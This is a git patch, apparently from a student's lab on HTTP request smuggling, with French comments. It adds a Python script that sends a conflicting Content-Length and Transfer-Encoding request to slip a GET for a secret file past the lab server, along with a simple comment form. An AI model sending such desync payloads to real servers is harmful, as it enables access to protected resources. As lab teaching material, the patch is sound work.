From 96700991ae449e04ad7173a871b0e39397928373 Mon Sep 17 00:00:00 2001
From: "justin.carvalheiro" <justin.carvalheiro@etu.uca.fr>
Date: Sun, 8 Oct 2023 15:25:27 +0000
Subject: [PATCH] script.py

---
 request_smuggling/script.py                   | 36 +++++++++++++++----
 request_smuggling/server/public_html/form.php |  4 +++
 .../server/public_html/index.html             |  6 ++++
 3 files changed, 40 insertions(+), 6 deletions(-)
 create mode 100644 request_smuggling/server/public_html/form.php

diff --git a/request_smuggling/script.py b/request_smuggling/script.py
index 0454048..80618b4 100644
--- a/request_smuggling/script.py
+++ b/request_smuggling/script.py
@@ -2,15 +2,39 @@ import requests
 import os
 
 # Configuration
-ipAddress = '172.17.0.2' # A modifier
+ipAddress = '128.11.0.6'
 os.environ['NO_PROXY'] = ipAddress
+urlServer = 'http://' + ipAddress + '/'
 
-
-data="GET /ADMIN"
+# Test requête 1
+data='comment=Bonjour!'
 byteLength = len(data.encode('utf-8'))
 headers = {'Content-Length' : str(byteLength)}
-url = 'http://' + ipAddress
+response = requests.post(urlServer, headers=headers, data=data)
+print("\nRequête 1 : POST du formulaire")
+print("Code de retour de la requête 1 :", response.status_code)
+print("Réponse requête 1 :")
+print(response.content)
 
-response = requests.post(url, headers=headers, data=data)
-print(response.raise_for_status)
+# Test requête 2
+url = urlServer + 'secret_file.txt'
+response = requests.get(url)
+print("\nRequête 2 : GET du fichier secret")
+print("Code de retour de la requête 2 :", response.status_code)
+print("Réponse requête 2 :")
 print(response.content)
+
+# EXERCICE
+print('\n\n')
+data='''
+
+0\r\n
+
+GET http://128.11.0.6/secret_file.txt'''
+byteLength = len(data.encode('utf-8'))
+headers = {'Content-Length' : str(byteLength), 'Transfer-Encoding' : 'chunked'}
+
+response = requests.post(urlServer, headers=headers, data=data)
+print(response.status_code)
+print(response.content)
+
diff --git a/request_smuggling/server/public_html/form.php b/request_smuggling/server/public_html/form.php
new file mode 100644
index 0000000..19728e8
--- /dev/null
+++ b/request_smuggling/server/public_html/form.php
@@ -0,0 +1,4 @@
+<?php
+
+echo 'Commentaire envoyé';
+
diff --git a/request_smuggling/server/public_html/index.html b/request_smuggling/server/public_html/index.html
index 1e9a2c1..19f3cfa 100644
--- a/request_smuggling/server/public_html/index.html
+++ b/request_smuggling/server/public_html/index.html
@@ -6,5 +6,11 @@
 </head>
 <body>
     <h1>Hello World !</h1>
+    <form action="form.php">
+        <input type="text" name="comment" id="comment">
+        <input type="submit" value="Envoyer">
+    </form>
 </body>
 </html>
+
+